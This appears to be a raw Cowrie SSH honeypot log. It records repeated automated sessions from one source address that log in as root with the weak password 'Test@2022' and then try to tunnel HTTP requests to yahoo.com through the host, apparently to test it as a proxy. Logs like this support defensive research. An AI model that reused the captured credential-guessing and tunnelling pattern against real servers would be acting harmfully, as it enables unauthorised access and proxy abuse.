{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.754430Z","src_ip":"213.209.150.239","session":"effa6239950f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":23203,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:23203","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.889540Z","session":"effa6239950f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.936824Z","src_ip":"213.209.150.239","session":"effa6239950f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:17.986773Z","src_ip":"213.209.150.239","session":"effa6239950f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22235,"dst_ip":"1.2.3.4","dst_port":22,"session":"b666bc7719f4","protocol":"ssh","message":"New connection: 213.209.150.239:22235 (1.2.3.4:22) [session: b666bc7719f4]","sensor":"my-vps","timestamp":"2025-08-26T01:02:18.032775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:18.033708Z","src_ip":"213.209.150.239","session":"b666bc7719f4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:18.080971Z","src_ip":"213.209.150.239","session":"b666bc7719f4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:18.316200Z","src_ip":"213.209.150.239","session":"b666bc7719f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":25772,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25772","sensor":"my-vps","timestamp":"2025-08-26T01:02:18.364313Z","session":"b666bc7719f4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:18.411604Z","src_ip":"213.209.150.239","session":"b666bc7719f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":27888,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:27888","sensor":"my-vps","timestamp":"2025-08-26T01:02:18.549598Z","session":"b666bc7719f4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:18.597153Z","src_ip":"213.209.150.239","session":"b666bc7719f4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:18.645882Z","src_ip":"213.209.150.239","session":"b666bc7719f4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22278,"dst_ip":"1.2.3.4","dst_port":22,"session":"7851302efec8","protocol":"ssh","message":"New connection: 213.209.150.239:22278 (1.2.3.4:22) [session: 7851302efec8]","sensor":"my-vps","timestamp":"2025-08-26T01:02:18.701385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:18.702264Z","src_ip":"213.209.150.239","session":"7851302efec8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:18.759014Z","src_ip":"213.209.150.239","session":"7851302efec8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:19.041210Z","src_ip":"213.209.150.239","session":"7851302efec8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":21872,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:21872","sensor":"my-vps","timestamp":"2025-08-26T01:02:19.099867Z","session":"7851302efec8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:19.156801Z","src_ip":"213.209.150.239","session":"7851302efec8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":5432,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:5432","sensor":"my-vps","timestamp":"2025-08-26T01:02:19.311074Z","session":"7851302efec8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:19.367685Z","src_ip":"213.209.150.239","session":"7851302efec8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:19.425112Z","src_ip":"213.209.150.239","session":"7851302efec8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22333,"dst_ip":"1.2.3.4","dst_port":22,"session":"26b76b22b54d","protocol":"ssh","message":"New connection: 213.209.150.239:22333 (1.2.3.4:22) [session: 26b76b22b54d]","sensor":"my-vps","timestamp":"2025-08-26T01:02:19.481041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:19.481749Z","src_ip":"213.209.150.239","session":"26b76b22b54d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:19.538648Z","src_ip":"213.209.150.239","session":"26b76b22b54d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:19.821974Z","src_ip":"213.209.150.239","session":"26b76b22b54d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":10615,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:10615","sensor":"my-vps","timestamp":"2025-08-26T01:02:19.879485Z","session":"26b76b22b54d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:19.936615Z","src_ip":"213.209.150.239","session":"26b76b22b54d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":21548,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21548","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.091154Z","session":"26b76b22b54d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.148128Z","src_ip":"213.209.150.239","session":"26b76b22b54d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.205973Z","src_ip":"213.209.150.239","session":"26b76b22b54d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22383,"dst_ip":"1.2.3.4","dst_port":22,"session":"627d3b4f9ca1","protocol":"ssh","message":"New connection: 213.209.150.239:22383 (1.2.3.4:22) [session: 627d3b4f9ca1]","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.251772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.261884Z","src_ip":"213.209.150.239","session":"627d3b4f9ca1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.299506Z","src_ip":"213.209.150.239","session":"627d3b4f9ca1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.534117Z","src_ip":"213.209.150.239","session":"627d3b4f9ca1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":15660,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:15660","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.582316Z","session":"627d3b4f9ca1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.629854Z","src_ip":"213.209.150.239","session":"627d3b4f9ca1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":28834,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:28834","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.765488Z","session":"627d3b4f9ca1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.812712Z","src_ip":"213.209.150.239","session":"627d3b4f9ca1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.861350Z","src_ip":"213.209.150.239","session":"627d3b4f9ca1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22429,"dst_ip":"1.2.3.4","dst_port":22,"session":"159974572436","protocol":"ssh","message":"New connection: 213.209.150.239:22429 (1.2.3.4:22) [session: 159974572436]","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.917055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.917703Z","src_ip":"213.209.150.239","session":"159974572436"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:20.974707Z","src_ip":"213.209.150.239","session":"159974572436"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:21.256785Z","src_ip":"213.209.150.239","session":"159974572436"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":20013,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:20013","sensor":"my-vps","timestamp":"2025-08-26T01:02:21.314389Z","session":"159974572436"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:21.371320Z","src_ip":"213.209.150.239","session":"159974572436"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":22085,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:22085","sensor":"my-vps","timestamp":"2025-08-26T01:02:21.526977Z","session":"159974572436"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:21.584497Z","src_ip":"213.209.150.239","session":"159974572436"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:21.642128Z","src_ip":"213.209.150.239","session":"159974572436"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22476,"dst_ip":"1.2.3.4","dst_port":22,"session":"698d5238107b","protocol":"ssh","message":"New connection: 213.209.150.239:22476 (1.2.3.4:22) [session: 698d5238107b]","sensor":"my-vps","timestamp":"2025-08-26T01:02:21.697658Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:21.698594Z","src_ip":"213.209.150.239","session":"698d5238107b"}
